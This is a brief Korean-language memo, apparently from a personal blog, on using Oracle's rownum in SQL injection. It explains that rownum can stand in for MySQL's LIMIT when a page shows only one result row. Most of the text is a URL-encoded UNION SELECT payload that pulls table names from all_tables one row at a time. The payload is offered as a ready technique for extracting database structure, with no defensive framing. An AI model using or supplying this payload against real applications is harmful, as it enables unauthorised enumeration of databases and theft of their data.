oracle sql injection with rownum

질의 결과를 하나씩 뿐이 볼 수 없을 때 mysql의 limit 처럼 rownum을 사용해서 원하는 데이터를 볼 수 있다.
select문으로 충분히 결과를 뽑아 놓고 다시 rownum으로 특정 값을 선택.

union+select+1,table_name,''+
         from+(select+rownum AS rnum,table_name+from+
                 (select +table_name+from+all_tables+order+by+table_name)
                 +where+rownum <= 200)+
         where+rnum=1--